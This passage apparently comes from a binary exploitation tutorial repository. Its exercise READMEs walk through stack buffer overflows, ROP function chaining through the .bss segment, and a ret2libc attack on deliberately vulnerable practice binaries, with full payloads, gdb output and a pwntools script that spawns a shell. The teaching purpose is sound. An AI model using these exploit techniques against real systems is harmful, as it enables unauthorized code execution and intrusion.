 61 | 0xffd48bcc: 0x00000000
 62 | 0xffd48bc8: 0x00000000
 63 | 0xffd48bc4: 0xf7720000
 64 | 0xffd48bc0: 0xffffffff
 65 | 0xffd48bbc: 0xf760b216
 66 | 0xffd48bb8: 0x000000c2
 67 | 0xffd48bb4: 0xf757f698
 68 | 0xffd48bb0: 0xf7751938
 69 | 0xffd48bac: 0xf762cad4
 70 | 0xffd48ba8: 0x000003e8
 71 | 0xffd48ba4: 0x000003e8
 72 | 0xffd48ba0: 0xffd48c00
 73 | 0xffd48b9c: 0x41414141 (beginning of buffer)
 74 | win = 0
 75 | Sorry, you lose.
 76 | ```
 77 | 
 78 | Now if you know a thing or two about ASCII, you'll know that `0x41` is the value of the character `A`. At the bottom of the stack dump, you'll notice that the beginning of the buffer contains `0x41414141`, or our four `A`'s. Now we can run it again, only this time we'll store a few more `A`'s. Pay attention to the addresses on the left :)
 79 | 
 80 | ```salt
 81 | /overflow1-3948d17028101c40 $(python -c 'print "A"*76')
 82 | Stack dump:
 83 | 0xfff577d4: 0xfff58853 (second argument)
 84 | 0xfff577d0: 0x00000000 (first argument)
 85 | 0xfff577cc: 0x0804870f (saved eip)
 86 | 0xfff577c8: 0xfff57700 (saved ebp)
 87 | 0xfff577c4: 0x41414141
 88 | 0xfff577c0: 0x41414141
 89 | 0xfff577bc: 0x41414141
 90 | 0xfff577b8: 0x41414141
 91 | 0xfff577b4: 0x41414141
 92 | 0xfff577b0: 0x41414141
 93 | 0xfff577ac: 0x41414141
 94 | 0xfff577a8: 0x41414141
 95 | 0xfff577a4: 0x41414141
 96 | 0xfff577a0: 0x41414141
 97 | 0xfff5779c: 0x41414141
 98 | 0xfff57798: 0x41414141
 99 | 0xfff57794: 0x41414141
100 | 0xfff57790: 0x41414141
101 | 0xfff5778c: 0x41414141
102 | 0xfff57788: 0x41414141
103 | 0xfff57784: 0x41414141
104 | 0xfff57780: 0x41414141
105 | 0xfff5777c: 0x41414141 (beginning of buffer)
106 | win = 1094795585
107 | Sorry, you lose.
108 | ```
109 | 
110 | This shell command: `$(python -c 'print "A"*76')` tells python to print out the `A` character 76 times.
111 | 
112 | Notice that the addresses on the left are completely different than the first run. This is normal, and due to something called `ASLR`, or Address Space Layout Randomization. Most modern OSes have `ASLR` enabled, which is protection that randomizes stack addresses on each run of a program.
113 | 
114 | Now, you might notice that `win = 1094795585` according to the stack dump. What just happened?
115 | 
116 | Back to the source:
117 | 
118 | ```C
119 | char buf[64];
120 | strcpy(buf, str);
121 | ```
122 | 
123 | **`strcpy()` is a dangerous function!**
124 | 
125 | Our buffer only holds 64 bytes, however, the buffer we ask to be copied contains 76 bytes. `strcpy()` doesn't care about checking lengths, so the extra 12 bytes that don't fit just get thrown onto the stack.
126 | 
127 | The value of `win` was stored right next to our buffer, so next let's try to set the value of `win` to `1`.
128 | 
129 | This is where things get a bit tricky...
130 | 
131 | We need to be careful not to confuse characters and integers. The character `1` is `0x30` in hex, but the integer `1` is `0x1` in hex (Note that this is not printable.)
132 | 
133 | We want to set `win` equal to the *integer* representation of `1`, not the character representation of `1`.
134 | 
135 | Since `win` is right after our buffer on the stack, we can just write 64 `A`'s in character format, followed by a single `"\x01"` to our buffer. This will leak the last byte (`0x01`) of the buffer we wrote to where `win` is stored, setting `win = 1`.
136 | 
137 | ```salt
138 | $ ./overflow1-3948d17028101c40 $(python -c 'print "A"*64 + "\x01"')
139 | Stack dump:
140 | 0xffe29f04: 0xffe2b85e (second argument)
141 | 0xffe29f00: 0x00000000 (first argument)
142 | 0xffe29efc: 0x0804870f (saved eip)
143 | 0xffe29ef8: 0xffe29f28 (saved ebp)
144 | 0xffe29ef4: 0xf7760000
145 | 0xffe29ef0: 0xf766caa7
146 | 0xffe29eec: 0x00000001
147 | 0xffe29ee8: 0x41414141
148 | 0xffe29ee4: 0x41414141
149 | 0xffe29ee0: 0x41414141
150 | 0xffe29edc: 0x41414141
151 | 0xffe29ed8: 0x41414141
152 | 0xffe29ed4: 0x41414141
153 | 0xffe29ed0: 0x41414141
154 | 0xffe29ecc: 0x41414141
155 | 0xffe29ec8: 0x41414141
156 | 0xffe29ec4: 0x41414141
157 | 0xffe29ec0: 0x41414141
158 | 0xffe29ebc: 0x41414141
159 | 0xffe29eb8: 0x41414141
160 | 0xffe29eb4: 0x41414141
161 | 0xffe29eb0: 0x41414141
162 | 0xffe29eac: 0x41414141 (beginning of buffer)
163 | win = 1
164 | $ ls
165 | overflow1-3948d17028101c40  overflow1-3948d17028101c40.c  README.md
166 | $ exit
167 | ```
168 | 
169 | If you try this for yourself, you'll get a shell. You've now sucessfully executed a buffer overflow attack!
170 | 


--------------------------------------------------------------------------------
/exercise-3/README.md:
--------------------------------------------------------------------------------
  1 | # Follow the Yellow Brick Functions
  2 | 
  3 | In this problem, I smartened up. Nowhere in the binary will you find `"/bin/sh"`
  4 | 
  5 | ```C
  6 | # include<stdio.h>
  7 | # include<string.h>
  8 | int main(int argc, char **argv) {
  9 |     putenv("PATH=");
 10 |     printf("I've broken up my system call!\n");
 11 |     printf("You think I've included what you need for this? You wish\n");
 12 |     char user_buf[64]= "";
 13 |     if (argc > 1) {
 14 |         strcpy(user_buf,argv[1]);
 15 |     }
 16 |     else {
 17 |         printf("usage: ./overflow [input]\n");
 18 |         return 0;
 19 |         }
 20 |     char buf1[10] = "/b";
 21 |     char buf2[8] = "in/";
 22 |     char buf3[5] = "date";
 23 |     strcat(buf2,buf3);
 24 |     strcat(buf1,buf2);
 25 |     system(buf1);
 26 |     printf("Aren't these string functions wonderful?\n");
 27 |     return 0;
 28 | }
 29 | ```
 30 | 
 31 | As you'll remember from the previous exercise, putting `"/bin/sh"` in the binary was a mistake. This problem is geared very similarly with a little bit of extra finesse. First things first, we'll find the offset of `%eip`
 32 | 
 33 | ```gdb
 34 | $ strace ./overflow $(python -c 'print "A"*76 + "BBBB"')
 35 | ...
 36 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
 37 | ```
 38 | 
 39 | After 76 bytes we have `%eip`! From here we have to get a bit clever. If you take anything from this exercise, it's this: **If a function is in the binary an PIE is not enabled, you have access to the function.** This means we can access to the `strcat()` and `strcpy()` functions. We can use these to cleverly get ourselves a shell.
 40 | 
 41 | Now, for a quick introduction to the `.bss` segment. `.bss` refers to the part of data memory used by many compilers and linkers for holding statically-allocated variables that are not explicitly initialized to any value. Regardless of what the program uses the `.bss` segment for, know that it's a scratch pad for hackers. We can use it to reliably store data when the stack is randomized. We could use the GOT, but it might mess up functions we need. Knowing this, how can we get a shell?
 42 | 
 43 | The answer lies in the functions used. We have the strings `"/b"` and `"in/"` in the binary. We also have `"sh"` at the end of the second print statement! :D
 44 | 
 45 | Let's use `objdump` to get some function addresses:
 46 | 
 47 | ```objdump
 48 | $ objdump -d overflow | grep ">:"
 49 | ...
 50 | 08048370 <strcat@plt>:
 51 | 08048380 <strcpy@plt>:
 52 | ...
 53 | 080483a0 <system@plt>:
 54 | ```
 55 | 
 56 | Next, we will need to find the start of the `.bss` segment:
 57 | 
 58 | ```gdb
 59 | $ gdb -q ./overflow
 60 | Reading symbols from ./overflow...(no debugging symbols found)...done.
 61 | gdb-peda$ info address __bss_start
 62 | Symbol "__bss_start" is at 0x804a030 in a file compiled without debugging.
 63 | ```
 64 | 
 65 | Now our exploit (abstractly) is as follows:
 66 | 
 67 | ```c
 68 | strcpy(&bss, &"/b" );
 69 | strcat(&bss, &"in/");
 70 | strcat(&bss,&"sh");
 71 | system(&bss)
 72 | ```
 73 | 
 74 | We'll need the addresses of strings in the binary:
 75 | 
 76 | ```gdb
 77 | $ gdb -q ./overflow
 78 | Reading symbols from ./overflow...(no debugging symbols found)...done.
 79 | gdb-peda$ b*main
 80 | Breakpoint 1 at 0x80484dd
 81 | gdb-peda$ r
 82 | Starting program: /vagrant/how2exploit_binary/overflow-3/overflow
 83 | Breakpoint 1, 0x080484dd in main ()
 84 | gdb-peda$ find "/b" binary
 85 | Searching for '/b' in: binary ranges
 86 | Found 2 results, display max 2 items:
 87 | overflow : 0x804854e (<main+113>:   das)
 88 | overflow : 0x804954e --> 0x622f ('/b')
 89 | gdb-peda$ find "in/" binary
 90 | Searching for 'in/' in: binary ranges
 91 | Found 2 results, display max 2 items:
 92 | overflow : 0x8048565 (<main+136>:   imul   $0x2444c700,0x2f(%esi),%ebp)
 93 | overflow : 0x8049565 --> 0x2f6e69 ('in/')
 94 | gdb-peda$ find "sh" binary
 95 | Searching for 'sh' in: binary ranges
 96 | Found 2 results, display max 2 items:
 97 | overflow : 0x80486ce --> 0x75006873 ('sh')
 98 | overflow : 0x80496ce --> 0x75006873 ('sh')
 99 | ```
100 | 
101 | Now that we have everything we need, we can learn one more important concept: Chaining Functions. If you only need to call one function to get a shell, you don't need to chain. Otherwise, we need to chain functions.
102 | 
103 | In order to chain functions together we need to somehow remove the arguments from the stack. As you know from before, standard x86 function calls look like:
104 | 
105 | \[function address\] \[return address\] \[arg1\] \[arg2\] ...
106 | 
107 | The first function will run, then the return address, then the program will SEGFAULT when it tries to run the argument as code. We can't have the program trying to run our arguments, so we need to pop them off of the stack.
108 | 
109 | This requires the use of Return Oriented Programming, or a ROP exploit. ROP uses any set of instructions in a binary that ends with a `ret` instruction. In order to find these, you can use `ropshell.com`, `gdb-peda`, or `ROPgadget`. We need a `pop;pop;ret` gadget since we need to pop two arguments off of the stack for every function call except system. Since system is our last call, we don't need a `pop;ret` gadget for it.
110 | 
111 | I'm using `gdb-peda` in this example.
112 | 
113 | ```gdb
114 | $ gdb -q ./overflow
115 | Reading symbols from ./overflow...(no debugging symbols found)...done.
116 | gdb-peda$ b*main
117 | Breakpoint 1 at 0x80484dd
118 | gdb-peda$ r
119 | Starting program: /vagrant/how2exploit_binary/overflow-3/overflow
120 | ...
121 | Breakpoint 1, 0x080484dd in main ()
122 | gdb-peda$ ropsearch "" binary
123 | Searching for ROP gadget: '' in: binary ranges
124 | ...
125 | 0x0804863e : (b'5f5dc3')    pop %edi; pop %ebp; ret
126 | ```
127 | 
128 | Luckily for us, the binary has the gadget we need! Chaining functions will take
129 | this form in our exploit (and future ones, too!)
130 | 
131 | \[&function\] \[&rop_gadget\] \[&arg1\] \[&arg2\] \[&next_function\]
132 | 
133 | You can use any number of arguments as long as you have a rop gadget with the same number of pops.
134 | 
135 | Let's give the exploit a try:
136 | 
137 | ```
138 | /overflow $(python -c 'print "A"*76 +
139 | "\x80\x83\x04\x08" + "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" +
140 | "\x4e\x95\x04\x08" + "\x70\x83\x04\x08" + "\x3e\x86\x04\x08" +
141 | "\x30\xa0\x04\x08" + "\x65\x95\x04\x08" + "\x70\x83\x04\x08" +
142 | "\x3e\x86\x04\x08" + "\x30\xa0\x04\x08" + "\xce\x96\x04\x08" +
143 | "\xa0\x83\x04\x08" + "FAKE" + "\x30\xa0\x04\x08"')
144 | ```
145 | 
146 | The layout of the exploit looks like the following:
147 | 
148 | ```
149 | <overflow> +
150 | <strcpy> + <pop pop ret> + <bss_start>
151 | <"/b"> + <strcat> + <pop pop ret>
152 | <bss_start> + <"/in"> + <strcat>
153 | <pop pop ret> + <bss_start> + <"sh">
154 | <system> + <FAKE> + <bss_start>
155 | ```
156 | 
157 | 
158 | You should get a shell, although you won't be able to do much as we didn't set privs. The concept, however, still stands.
159 | 


--------------------------------------------------------------------------------
/exercise-4/README.md:
--------------------------------------------------------------------------------
  1 | # Pay your local library a visit
  2 | 
  3 | At this point you're probably used to hunting through binaries for useful functions or code that you can use to get a shell. But what do you do without a call to `system()`?
  4 | 
  5 | The simple answer: get a shell anyways. :)
  6 | 
  7 | The long answer is a bit more complicated. This attack is called a "Return to `libc`", or `ret2libc` for short. If you don't remember the PLT and GOT from before, now is a good time to check the [glossary](../terms) and maybe do some googling. You'll recall that ASLR randomizes the libc address, but the good news is that with arbitrary `read()` and `write()` calls, you can easily circumvent this.
  8 | 
  9 | This binary has what we call Dynamic Input, which is some super fancy ego-inflating jargon that means we can change inputs in the same program. Basically any program where you can trigger the vulnerability twice (or more) with different exploits in the same run is dynamic. If it still doesn't make sense, just stay tuned.
 10 | 
 11 | If you haven't already, run through [Exercise 3.5: Intro to pwntools](../exercise-3.5)
 12 | 
 13 | Seriously, go do that.
 14 | 
 15 | Now that you've made it this far, I'll give a brief overview of this style of exploit. The libc functions that the PLT stubs call aren't just some magical ethereal functions. They're real and they're mapped to a real page in memory with an address that you can call if you're clever. **The entire libc is in the binary.** From here, we exploit the fact that truly randomizing everything is computationally expensive. Instead, ASLR only randomizes the **base address** of the libc. This means that `&function_1 - &function_2` is constant as long as you're using the same libc file. With this in mind, the goal is to leak (`write()`) the address of some libc function to stdout. we then take that address, compute the address of system, call `main()` (or whatever function contains the vulnerability) again, and call `system()` with the newly computed address.
 16 | 
 17 | Still confused? I was when I first learned this, but I'll try to explain as I go.
 18 | 
 19 | First, we have to calculate the offset of `%eip`
 20 | 
 21 | ```shell
 22 | $ python -c 'print "A"*140 + "BBBB"' | strace ./exercise-4
 23 | ...
 24 | --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
 25 | ```
 26 | 
 27 | After `140 bytes`, we have `%eip`
 28 | 
 29 | From here, we need to leak the address of a `libc` function.
 30 | 
 31 | We can do this by calling `write(1, &function, 4)`
 32 | 
 33 | I'll be using the GOT address of `read()` (remember that the GOT is an array of pointers into libc)
 34 | 
 35 | ```objdump
 36 | $ objdump -d exercise-4 | grep ">:a"
 37 | ...
 38 | 08048370 <write@plt>:
 39 | ...
 40 | 
 41 | $ objdump -R exercise-4
 42 | ...
 43 | 0804a00c R_386_JUMP_SLOT   read
 44 | ...
 45 | ```
 46 | 
 47 | With these addresses, we get the following exploit.
 48 | 
 49 | ```shell
 50 | python -c 'print "A"*140 + "\x70\x83\x04\x08" + "RETN" +
 51 | "\x01\x00\x00\x00"+ "\x0c\xa0\x04\x08" + "\x04\x00\x00\x00"' | ./exercise-4
 52 | ```
 53 | 
 54 | If you go ahead and run this a few times, you'll get some weird outputs:
 55 | 
 56 | ```shell
 57 | �+o�Segmentation fault (core dumped)
 58 | �kh�Segmentation fault (core dumped)
 59 | ��n�Segmentation fault (core dumped)
 60 | ```
 61 | 
 62 | The four bytes before the SEGFAULT are the libc address.
 63 | 
 64 | From here, we're going to run:
 65 | 
 66 | ```shell
 67 | $ ldd exercise-4
 68 |     linux-gate.so.1 =>  (0xf76f9000)
 69 |     libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf753c000)
 70 |     /lib/ld-linux.so.2 (0xf76fa000)
 71 | ```
 72 | 
 73 | Since this is a local binary challenge, the `libc` file is just going to be whatever the standard one is on your computer. **The same binary running on a different machine could have a different `libc`, and therefore give you different results.**
 74 | 
 75 | All we have to do is grab a copy of that `libc` and put it in our directory. If you ever exploit a remote binary and you don't have the `libc`, there are plenty of places you can get them online.
 76 | 
 77 | ```shell
 78 | $ cp /lib/i386-linux-gnu/libc.so.6 ./
 79 | ```
 80 | 
 81 | Now we need `pwntools`.
 82 | 
 83 | We'll start our script off with the typical items:
 84 | 
 85 | ```Python
 86 | from pwn import *
 87 | context(arch='i386', os='linux') # <-- Add the architecture and os
 88 | binary = ELF("exercise-4")
 89 | libc = ELF("libc.so.6")
 90 | 
 91 | r = process("./exercise-4")
 92 | ```
 93 | 
 94 | After this, we know we'll need the `read()`, `write()`, the GOT address of `read()`, and a `pop; ret` ropgadget, so we add these in.
 95 | 
 96 | ```python
 97 | write_plt = p32(binary.symbols["write"])
 98 | read_GOT = p32(binary.symbols["got.read"])
 99 | read_plt = p32(binary.symbols["read"])
100 | bss_addr = p32(binary.symbols["__bss_start"])
101 | pop_ret = "\x9d\x85\x04\x08"
102 | ```
103 | 
104 | Now the binary outputs a line first, so we add:
105 | 
106 | ```python
107 | r.recvline()
108 | ```
109 | 
110 | Now we should start building our exploit. We want to try to avoid using the escape strings from before, it makes for nicer code and forces you to use `pwntools` the right way.
111 | 
112 | ```python
113 | exploit = "A"*140                                               # EIP offset
114 | exploit += write_plt +pop_ret +  p32(1)+ read_GOT + p32(4)      # Call to write()
115 | exploit += p32(binary.symbols["main"])                          # Call main() again to retrigger the vulnerability
116 | 
117 | ```
118 | 
119 | Now we want to send the first payload:
120 | 
121 | ```python
122 | r.sendline(exploit)
123 | ```
124 | 
125 | Now here's the cool part. Since we know that the program prints out the address of `read()` in the `libc` (remember those funky bytes from earlier before the SEGFAULT?) we can take those and calculate the base address of `libc`. This indirectly means that we can call any function in the standard library.
126 | 
127 | ```python
128 | addr_read = int(r.recv(4)[::-1].encode("hex"),16)
129 | r.recvline()
130 | libc_base = addr_read - libc.symbols["read"]
131 | system = p32(libc_base + libc.symbols["system"])
132 | ```
133 | 
134 | Let's break down my hacky `addr_read` line.
135 | 
136 | 1. `recv()` 4 bytes from `r`
137 | 2. Reverses the remaining bytes (because of little endian encoding)  and converts them to hex
138 | 3. Parse that as an integer.
139 | 
140 | Voila! We now have the address of `read()` in `libc`.
141 | 
142 | From there, we subtract `read()`s address in the regular libc, giving us the base address for this runtime. In the last line, we add the offset of `system()` in the libc to our calculated base. This gives us the address of system for this runtime.
143 | 
144 | The best part of this whole show is that the pesky `"/bin/sh"` string we need is in `libc`! We can calculate the address of that as well!
145 | 
146 | ```python
147 | binsh = p32(libc_base +  libc.search("/bin/sh").next())
148 | ```
149 | 
150 | Now all we've got to do is send our exploit with some extra padding (it was 140 before, but now it's 148 since we overflow from before the stack frame) and we get a shell.
151 | 
152 | ```python
153 | r.sendline("A"*148+ system + "RETN" + binsh + binsh) # <- 148?????? why 148?
154 | r.interactive()
155 | ```
156 | 


--------------------------------------------------------------------------------